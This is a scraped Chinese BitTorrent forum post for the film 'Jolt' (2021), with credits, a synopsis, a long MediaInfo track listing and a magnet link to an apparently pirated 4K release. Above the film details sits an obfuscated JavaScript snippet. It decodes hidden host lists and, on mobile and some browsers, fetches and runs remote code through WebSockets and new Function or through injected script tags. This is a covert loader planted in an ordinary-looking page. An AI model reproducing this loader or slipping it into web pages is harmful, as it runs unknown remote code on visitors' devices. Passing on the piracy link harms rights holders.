警醒[中文字幕]Jolt.2021.2160p.HDR.AMZN.WEB-DL.DDP5.1.H.265-迅雷下载 12.40GB

版主小s 2月前 578

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 警醒

◎片 名 Jolt

◎年 代 2021

◎产 地 美国

◎类 别 喜剧 / 动作

◎语 言 英语

◎上映日期 2021-07-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt10228134/

◎豆瓣链接 https://movie.douban.com/subject/33423676/

◎导 演 谭雅·维克斯勒 Tanya Wexler (id:1023230)

◎编 剧 Louis Waymouth Louis Waymouth (id:1182685)

◎演 员 凯特·贝金赛尔 Kate Beckinsale (id:1003487)

斯坦利·图齐 Stanley Tucci (id:1040517)

鲍比·坎纳瓦尔 Bobby Cannavale (id:1044985)

苏珊·萨兰登 Susan Sarandon (id:1054392)

杰·科特尼 Jai Courtney (id:1324668)

大卫·布拉德利 David Bradley (id:1072471)

拉弗恩·考克斯 Laverne Cox (id:1332182)

克里斯蒂安·布拉辛顿 Christian Brassington (id:1223458)

奥利·普费弗 Ori Pfeffer (id:1395525)

康斯坦丁·格雷戈里 Constantine Gregory (id:1100751)

内森·库珀 Nathan Cooper (id:1383903)

哈里·阿尼奇金 Harry Anichkin (id:1191175)

◎标 签 动作 / 凯特·贝金赛尔 / 2021 / 美国电影 / 惊悚 / 美国 / 美漫宇宙 / katebeckinsale

◎简 介

琳迪这个漂亮风趣的女人有一个痛苦的秘密:由于终身的、罕见的神经紊乱,她经历了阵发性的狂怒杀人冲动,解决方式只有用特殊电极装置电自己。在一个害怕她的奇怪状况的世界里,她无法找到爱和联系,最终她信任了一个男人,并爱上了他,却发现第二天他被谋杀了。

琳迪感到心碎和愤怒,她开始了一个复仇值拉满的任务,寻找幕后杀手,与此同时,她也被警察作为这个案子的头号嫌疑犯追捕着。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 36687789805817093298837293288274076309 (0x1B99CFB13A7881EAB2FDAAC38FED2295)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.4 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate : 19.5 Mb/s

  10. Encoded date : UTC 2021-07-23 06:11:51

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. HDR format : SMPTE ST 2094 App 4, Version 1, HDR10+ Profile B compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 31 min

  21. Bit rate : 14.4 Mb/s

  22. Width : 3 840 pixels

  23. Height : 1 600 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.098

  31. Stream size : 9.14 GiB (74%)

  32. Default : Yes

  33. Forced : No

  34. Color range : Limited

  35. Color primaries : BT.2020

  36. Transfer characteristics : PQ

  37. Matrix coefficients : BT.2020 non-constant

  38. Mastering display color primaries : Display P3

  39. Mastering display luminance : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level : 1140 cd/m2

  41. Maximum Frame-Average Light Level : 831 cd/m2


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 1 h 31 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 417 MiB (3%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3

  65. Format/Info : Enhanced AC-3

  66. Commercial name : Dolby Digital Plus

  67. Codec ID : A_EAC3

  68. Duration : 1 h 31 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 417 MiB (3%)

  77. Title : English [Audio Description]

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : E-AC-3

  85. Format/Info : Enhanced AC-3

  86. Commercial name : Dolby Digital Plus

  87. Codec ID : A_EAC3

  88. Duration : 1 h 31 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 417 MiB (3%)

  97. Title : Castilian

  98. Language : Spanish

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : E-AC-3

  105. Format/Info : Enhanced AC-3

  106. Commercial name : Dolby Digital Plus

  107. Codec ID : A_EAC3

  108. Duration : 1 h 31 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 417 MiB (3%)

  117. Title : Spanish

  118. Language : Spanish

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Audio #5

  123. ID : 6

  124. Format : E-AC-3

  125. Format/Info : Enhanced AC-3

  126. Commercial name : Dolby Digital Plus

  127. Codec ID : A_EAC3

  128. Duration : 1 h 31 min

  129. Bit rate mode : Constant

  130. Bit rate : 640 kb/s

  131. Channel(s) : 6 channels

  132. Channel layout : L R C LFE Ls Rs

  133. Sampling rate : 48.0 kHz

  134. Frame rate : 31.250 FPS (1536 SPF)

  135. Compression mode : Lossy

  136. Stream size : 417 MiB (3%)

  137. Title : French

  138. Language : French

  139. Service kind : Complete Main

  140. Default : No

  141. Forced : No


  142. Audio #6

  143. ID : 7

  144. Format : E-AC-3

  145. Format/Info : Enhanced AC-3

  146. Commercial name : Dolby Digital Plus

  147. Codec ID : A_EAC3

  148. Duration : 1 h 31 min

  149. Bit rate mode : Constant

  150. Bit rate : 640 kb/s

  151. Channel(s) : 6 channels

  152. Channel layout : L R C LFE Ls Rs

  153. Sampling rate : 48.0 kHz

  154. Frame rate : 31.250 FPS (1536 SPF)

  155. Compression mode : Lossy

  156. Stream size : 417 MiB (3%)

  157. Title : Italian

  158. Language : Italian

  159. Service kind : Complete Main

  160. Default : No

  161. Forced : No


  162. Audio #7

  163. ID : 8

  164. Format : E-AC-3

  165. Format/Info : Enhanced AC-3

  166. Commercial name : Dolby Digital Plus

  167. Codec ID : A_EAC3

  168. Duration : 1 h 31 min

  169. Bit rate mode : Constant

  170. Bit rate : 640 kb/s

  171. Channel(s) : 6 channels

  172. Channel layout : L R C LFE Ls Rs

  173. Sampling rate : 48.0 kHz

  174. Frame rate : 31.250 FPS (1536 SPF)

  175. Compression mode : Lossy

  176. Stream size : 417 MiB (3%)

  177. Title : Polish

  178. Language : Polish

  179. Service kind : Complete Main

  180. Default : No

  181. Forced : No


  182. Audio #8

  183. ID : 9

  184. Format : E-AC-3

  185. Format/Info : Enhanced AC-3

  186. Commercial name : Dolby Digital Plus

  187. Codec ID : A_EAC3

  188. Duration : 1 h 31 min

  189. Bit rate mode : Constant

  190. Bit rate : 640 kb/s

  191. Channel(s) : 6 channels

  192. Channel layout : L R C LFE Ls Rs

  193. Sampling rate : 48.0 kHz

  194. Frame rate : 31.250 FPS (1536 SPF)

  195. Compression mode : Lossy

  196. Stream size : 417 MiB (3%)

  197. Title : Portuguese

  198. Language : Portuguese

  199. Service kind : Complete Main

  200. Default : No

  201. Forced : No


  202. Text #1

  203. ID : 10

  204. Format : UTF-8

  205. Codec ID : S_TEXT/UTF8

  206. Codec ID/Info : UTF-8 Plain Text

  207. Duration : 1 h 30 min

  208. Bit rate : 48 b/s

  209. Count of elements : 1029

  210. Stream size : 31.9 KiB (0%)

  211. Title : Danish

  212. Language : Danish

  213. Default : No

  214. Forced : No


  215. Text #2

  216. ID : 11

  217. Format : UTF-8

  218. Codec ID : S_TEXT/UTF8

  219. Codec ID/Info : UTF-8 Plain Text

  220. Duration : 1 h 24 min

  221. Bit rate : 70 b/s

  222. Count of elements : 1588

  223. Stream size : 44.0 KiB (0%)

  224. Title : English (SDH)

  225. Language : English

  226. Default : No

  227. Forced : No


  228. Text #3

  229. ID : 12

  230. Format : UTF-8

  231. Codec ID : S_TEXT/UTF8

  232. Codec ID/Info : UTF-8 Plain Text

  233. Duration : 1 h 30 min

  234. Bit rate : 49 b/s

  235. Count of elements : 1028

  236. Stream size : 32.9 KiB (0%)

  237. Title : Castilian

  238. Language : Spanish

  239. Default : No

  240. Forced : No


  241. Text #4

  242. ID : 13

  243. Format : UTF-8

  244. Codec ID : S_TEXT/UTF8

  245. Codec ID/Info : UTF-8 Plain Text

  246. Duration : 1 h 30 min

  247. Bit rate : 47 b/s

  248. Count of elements : 1030

  249. Stream size : 31.7 KiB (0%)

  250. Title : Spanish

  251. Language : Spanish

  252. Default : No

  253. Forced : No


  254. Text #5

  255. ID : 14

  256. Format : UTF-8

  257. Codec ID : S_TEXT/UTF8

  258. Codec ID/Info : UTF-8 Plain Text

  259. Duration : 1 h 30 min

  260. Bit rate : 50 b/s

  261. Count of elements : 1025

  262. Stream size : 33.4 KiB (0%)

  263. Title : French

  264. Language : French

  265. Default : No

  266. Forced : No


  267. Text #6

  268. ID : 15

  269. Format : UTF-8

  270. Codec ID : S_TEXT/UTF8

  271. Codec ID/Info : UTF-8 Plain Text

  272. Duration : 1 h 30 min

  273. Bit rate : 48 b/s

  274. Count of elements : 1026

  275. Stream size : 32.3 KiB (0%)

  276. Title : Italian

  277. Language : Italian

  278. Default : No

  279. Forced : No


  280. Text #7

  281. ID : 16

  282. Format : UTF-8

  283. Codec ID : S_TEXT/UTF8

  284. Codec ID/Info : UTF-8 Plain Text

  285. Duration : 1 h 30 min

  286. Bit rate : 52 b/s

  287. Count of elements : 1026

  288. Stream size : 34.8 KiB (0%)

  289. Title : Hungarian

  290. Language : Hungarian

  291. Default : No

  292. Forced : No


  293. Text #8

  294. ID : 17

  295. Format : UTF-8

  296. Codec ID : S_TEXT/UTF8

  297. Codec ID/Info : UTF-8 Plain Text

  298. Duration : 1 h 30 min

  299. Bit rate : 47 b/s

  300. Count of elements : 1021

  301. Stream size : 31.3 KiB (0%)

  302. Title : Dutch

  303. Language : Dutch

  304. Default : No

  305. Forced : No


  306. Text #9

  307. ID : 18

  308. Format : UTF-8

  309. Codec ID : S_TEXT/UTF8

  310. Codec ID/Info : UTF-8 Plain Text

  311. Duration : 1 h 30 min

  312. Bit rate : 49 b/s

  313. Count of elements : 1030

  314. Stream size : 32.7 KiB (0%)

  315. Title : Norwegian

  316. Language : Norwegian Bokmal

  317. Default : No

  318. Forced : No


  319. Text #10

  320. ID : 19

  321. Format : UTF-8

  322. Codec ID : S_TEXT/UTF8

  323. Codec ID/Info : UTF-8 Plain Text

  324. Duration : 1 h 30 min

  325. Bit rate : 43 b/s

  326. Count of elements : 1025

  327. Stream size : 28.8 KiB (0%)

  328. Title : Polish

  329. Language : Polish

  330. Default : No

  331. Forced : No


  332. Text #11

  333. ID : 20

  334. Format : UTF-8

  335. Codec ID : S_TEXT/UTF8

  336. Codec ID/Info : UTF-8 Plain Text

  337. Duration : 1 h 30 min

  338. Bit rate : 48 b/s

  339. Count of elements : 1030

  340. Stream size : 32.0 KiB (0%)

  341. Title : Portuguese (Brasil)

  342. Language : Portuguese

  343. Default : No

  344. Forced : No


  345. Text #12

  346. ID : 21

  347. Format : UTF-8

  348. Codec ID : S_TEXT/UTF8

  349. Codec ID/Info : UTF-8 Plain Text

  350. Duration : 1 h 30 min

  351. Bit rate : 50 b/s

  352. Count of elements : 1027

  353. Stream size : 33.7 KiB (0%)

  354. Title : Portuguese (Portugal)

  355. Language : Portuguese

  356. Default : No

  357. Forced : No


  358. Text #13

  359. ID : 22

  360. Format : UTF-8

  361. Codec ID : S_TEXT/UTF8

  362. Codec ID/Info : UTF-8 Plain Text

  363. Duration : 1 h 30 min

  364. Bit rate : 49 b/s

  365. Count of elements : 1026

  366. Stream size : 32.9 KiB (0%)

  367. Title : Romanian

  368. Language : Romanian

  369. Default : No

  370. Forced : No


  371. Text #14

  372. ID : 23

  373. Format : UTF-8

  374. Codec ID : S_TEXT/UTF8

  375. Codec ID/Info : UTF-8 Plain Text

  376. Duration : 1 h 30 min

  377. Bit rate : 44 b/s

  378. Count of elements : 1025

  379. Stream size : 29.5 KiB (0%)

  380. Title : Finnish

  381. Language : Finnish

  382. Default : No

  383. Forced : No


  384. Text #15

  385. ID : 24

  386. Format : UTF-8

  387. Codec ID : S_TEXT/UTF8

  388. Codec ID/Info : UTF-8 Plain Text

  389. Duration : 1 h 30 min

  390. Bit rate : 51 b/s

  391. Count of elements : 1025

  392. Stream size : 34.3 KiB (0%)

  393. Title : Swedish

  394. Language : Swedish

  395. Default : No

  396. Forced : No


  397. Text #16

  398. ID : 25

  399. Format : UTF-8

  400. Codec ID : S_TEXT/UTF8

  401. Codec ID/Info : UTF-8 Plain Text

  402. Duration : 1 h 30 min

  403. Bit rate : 49 b/s

  404. Count of elements : 1030

  405. Stream size : 33.0 KiB (0%)

  406. Title : Turkish

  407. Language : Turkish

  408. Default : No

  409. Forced : No


  410. Text #17

  411. ID : 26

  412. Format : UTF-8

  413. Codec ID : S_TEXT/UTF8

  414. Codec ID/Info : UTF-8 Plain Text

  415. Duration : 1 h 30 min

  416. Bit rate : 54 b/s

  417. Count of elements : 1030

  418. Stream size : 35.9 KiB (0%)

  419. Title : Czech

  420. Language : Czech

  421. Default : No

  422. Forced : No


  423. Text #18

  424. ID : 27

  425. Format : UTF-8

  426. Codec ID : S_TEXT/UTF8

  427. Codec ID/Info : UTF-8 Plain Text

  428. Duration : 1 h 30 min

  429. Bit rate : 94 b/s

  430. Count of elements : 1029

  431. Stream size : 63.1 KiB (0%)

  432. Title : Greek

  433. Language : Greek

  434. Default : No

  435. Forced : No


TAGS 动作 喜剧

磁力链:
  • magnet:?xt=urn:btih:8D745A7C49E13A5B6110EC4AE64F1EF39E3892B4
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回